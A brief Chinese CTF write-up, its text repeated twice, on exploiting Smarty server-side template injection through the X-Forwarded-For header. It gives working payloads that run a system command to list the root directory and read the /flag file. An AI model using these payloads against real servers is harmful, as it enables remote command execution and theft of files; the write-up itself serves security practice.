看到Smarty,提示是模板注入了,
又提示ip这个东西
直接用X-Forwarded-For测试
存在模板注入,
百度查资料
参考文献
根据参考文献给的poc,直接RCE
payload
{if system('ls /')}{/if}
可以发现flag在根目录下,但是我们查看不了,可能禁用了指令
我换了个指令show_source(),高亮显示文件
payload
{if show_source("/flag")}{/if}
看到Smarty,提示是模板注入了,
又提示ip这个东西
直接用X-Forwarded-For测试
存在模板注入,
百度查资料
参考文献
根据参考文献给的poc,直接RCE
payload
{if system('ls /')}{/if}
可以发现flag在根目录下,但是我们查看不了,可能禁用了指令
我换了个指令show_source(),高亮显示文件
payload
{if show_source("/flag")}{/if}